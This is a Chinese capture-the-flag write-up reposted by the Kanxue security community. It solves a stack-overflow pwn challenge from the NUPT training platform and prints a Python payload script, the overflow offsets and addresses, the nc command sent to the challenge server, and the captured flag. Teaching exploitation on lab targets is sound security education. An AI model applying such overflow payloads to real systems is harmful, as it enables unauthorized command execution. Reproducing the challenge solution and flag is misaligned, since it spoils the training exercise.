微信号:ikanxue

介绍:致力于移动与安全研究的开发者社区,看雪学院(kanxue.com)官方微信公众帐号.

简单分析南邮实训平台pwn方向真题

2019-03-14 18:01 顾言庭

简单分析南邮实训平台pwn方向第二题 - Stack Overflow


环境配置


系统 : Windows xp / ubuntu 32bit
程序 :
cgpwna
要求 : 缓冲区溢出执行cat命令
使用工具 :IDA



开始分析


  • 搜集线索


在linux系统中,使用file命令查看文件的信息:

➜  playground file cgpwna

cgpwna: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=8648818dcc39023c4dac61d2edb091bcd3fd3270, not stripped


发现是32位的可执行程序,我们可以先运行一下,了解其输出:

➜  playground ./cgpwna

what do you want to do?

1.leave some message.

2.nothing.

your choice:

1

you can leave some message here:

123

your name please:

12333

Thank you

what do you want to do?

1.leave some message.

2.nothing.

your choice:

1

you can leave some message here:

1

your name please:

12

Thank you

what do you want to do?

1.leave some message.

2.nothing.

your choice:

2

bye


直接用ida载入该程序,按下Shift+F12查看字符串列表:

.rodata:08048700   0000000C C echo hello!                     

.rodata:0804870C 00000018 C what do you want to do?

.rodata:08048724 00000016 C 1.leave some message.

.rodata:0804873A 0000000B C 2.nothing.

.rodata:08048745 0000000D C your choice:

.rodata:08048754 00000021 C you can leave some message here:

.rodata:08048775 00000012 C your name please:

.rodata:08048787 0000000A C Thank you

.eh_frame:08048813 00000005 C ;*2$\"


双击字符串bye查看具体信息,这里通过交叉参考功能定位到main函数,按下F5查看其伪c代码:

int __cdecl main(int argc, const char **argv, const char **envp)

{

setbuf(stdin, 0);

setbuf(stdout, 0);

setbuf(stderr, 0);

while ( 1 )

{

menu();

fgets(&choice, 100, stdin);

if ( choice != 49 )

break;

message();

}

puts("bye");

return 0;

}


其中的两个函数内容如下:

int menu()

{

puts("what do you want to do?");

puts("1.leave some message.");

puts("2.nothing.");

return puts("your choice:");

}



int message()

{

char s; // [sp+18h] [bp-30h]@1



n = 10;

puts("you can leave some message here:");

fgets(A, 60, stdin);

puts("your name please:");

fgets(&s, n, stdin);

return puts("Thank you");

}



  • 查找溢出点


这里,接收用户输入的函数的fgets函数:

函数原型

char *fgets(char *buf, int bufsize, FILE *stream);

参数

*buf: 字符型指针,指向用来存储所得数据的地址。

bufsize: 整型数据,指明存储数据的大小。

*stream: 文件结构体指针,将要读取的文件流。


该函数指定了buf的大小,看上去没有什么问题,我们再检查下缓冲区:



这里,缓冲区只有40字节的大小,却指定可以接受60个字节大小的数据呢。我们双击'A'查看详细信息:

.bss:0804A080 ; char A[40]

.bss:0804A080 A db 28h dup(?) ; DATA XREF: message+2Do

.bss:0804A0A8 ; int n

.bss:0804A0A8 n dd ? ; DATA XREF: message+6w

.bss:0804A0A8 ; message+4Br


我们可以给予缓冲区A超过40字节的数据来替换掉n的值,这样就能溢出缓冲区s的值了:

fgets(&s, n, stdin);


双击n查看函数栈视图:

-00000030 s               db ?

-0000002F db ? ; undefined

-0000002E db ? ; undefined

-0000002D db ? ; undefined

-0000002C db ? ; undefined

-0000002B db ? ; undefined

-0000002A db ? ; undefined

-00000029 db ? ; undefined

-00000028 db ? ; undefined

-00000027 db ? ; undefined

-00000026 db ? ; undefined

-00000025 db ? ; undefined

-00000024 db ? ; undefined

-00000023 db ? ; undefined

-00000022 db ? ; undefined

-00000021 db ? ; undefined

-00000020 db ? ; undefined

-0000001F db ? ; undefined

-0000001E db ? ; undefined

-0000001D db ? ; undefined

-0000001C db ? ; undefined

-0000001B db ? ; undefined

-0000001A db ? ; undefined

-00000019 db ? ; undefined

-00000018 db ? ; undefined

-00000017 db ? ; undefined

-00000016 db ? ; undefined

-00000015 db ? ; undefined

-00000014 db ? ; undefined

-00000013 db ? ; undefined

-00000012 db ? ; undefined

-00000011 db ? ; undefined

-00000010 db ? ; undefined

-0000000F db ? ; undefined

-0000000E db ? ; undefined

-0000000D db ? ; undefined

-0000000C db ? ; undefined

-0000000B db ? ; undefined

-0000000A db ? ; undefined

-00000009 db ? ; undefined

-00000008 db ? ; undefined

-00000007 db ? ; undefined

-00000006 db ? ; undefined

-00000005 db ? ; undefined

-00000004 db ? ; undefined

-00000003 db ? ; undefined

-00000002 db ? ; undefined

-00000001 db ? ; undefined

+00000000 s db 4 dup(?)

+00000004 r db 4 dup(?)

+00000008

+00000008 ; end of stack variables


此处我们知道,要溢出覆盖n的值,需要40+4个字节的数据填充;而要溢出覆盖函数返回地址,则需要30h+8h=38h(56)个字节的数据。



  • 寻找现有函数


在ida的函数列表视图中,很轻松的找到了pwnme函数:

int pwnme()

{

return system("echo hello!");

}


我们需要修改函数的参数,然后调用system函数执行cat命令查看flag文件。



  • 推理


再来仔细看看函数的汇编代码:

.text:0804851D                 public pwnme

.text:0804851D pwnme proc near

.text:0804851D push ebp

.text:0804851E mov ebp, esp

.text:08048520 sub esp, 18h

.text:08048523 mov dword ptr [esp], offset command ; "echo hello!"

.text:0804852A call _system

.text:0804852F leave

.text:08048530 retn

.text:08048530 pwnme endp


函数将command字符串的地址放入esp寄存器指向的栈空间,然后调用了system函数。


我们要做的事,就是将要执行的命令放入缓冲区A中(地址固定),然后将缓冲区A的地址,放入esp寄存器指向的栈空间中,最后直接跳转到地址
0804852A调用system函数。

 

也就是说,我们想要利用漏洞执行cat命令,有两个条件:


  • 能控制程序流程,让其跳转至地址0804852A

  • 确保esp指向的栈空间,保存的是输入的命令(缓冲区A)的地址。

我们知道,执行ret时会弹栈,esp会指向函数返回地址的下一格栈单元:

 

所以不妨填充函数返回地址下方的栈单元为offest A,当ret 指令跳转执行call system命令时,esp也指向了缓冲区A的地址。



编写shellcode


按照以上推理,用python编写shellcode如下:

cmd ='cat /home/pwn/flag\x001111111111111111111111111\n'



f = open('my_shellcode','w')

f.write('1\n')

f.write(cmd)

f.write('1111111111111111111111111111111111111111111111111111\x2A\x85\x04\x08\x80\xA0\x04\x08\n')

f.close()



夺旗成功


连接服务器,用生成的文件作为输入:

➜  playground  nc 182.254.217.142 10001 < my_shellcode

what do you want to do?

1.leave some message.

2.nothing.

your choice:

you can leave some message here:

your name please:

Thank you

flag{Naya_chyo_ma_thur_meh_lava_ma_puoru}



参考链接


1、栈溢出漏洞的利用和缓解

https://evilpan.com/2018/03/17/exploit-the-stack/#top


2、fgets函数

https://baike.baidu.com/item/fgets/10942211?fr=aladdin



- End -


看雪ID:顾言庭             

https://bbs.pediy.com/user-800468.htm



文由看雪论坛 顾言庭 原创

转载请注明来自看雪社区



热门图书推荐:

立即购买!


(晋级赛Q1正在火热进行中~!比赛时间:3.10-3.24)



热门文章阅读


1、Android ART invoke 代码生成

2、看雪会员专享(含餐)| 第九期网络安全创新发展高端论坛——人工智能安全

3、ETW注册表监控windows内核实现原理

4、选择编程语言前需要知道的事





公众号ID:ikanxue

官方微博:看雪安全

商务合作:wsc@kanxue.com


点击下方“阅读原文”
 
看雪学院 更多文章 赛况直播 | 2019 KCTF 开战,这里只用实力说话 使用IDA pro逆向ARM M系核心的Bin固件 今天中午12点,相约看雪CTF 晋级赛Q1,battle起来! 看雪会员专享(含餐)| 第九期网络安全创新发展高端论坛——人工智能安全 ScyllaHide的Hook原理
猜您喜欢 彩票的数学知识 程序学徒与导师 三亚的合作伙伴大会上,大佬们都说了些啥? 微信移动端数据库组件WCDB系列(二) — 数据库修复三板斧 日常使用Git,这些问题你遇到过吗?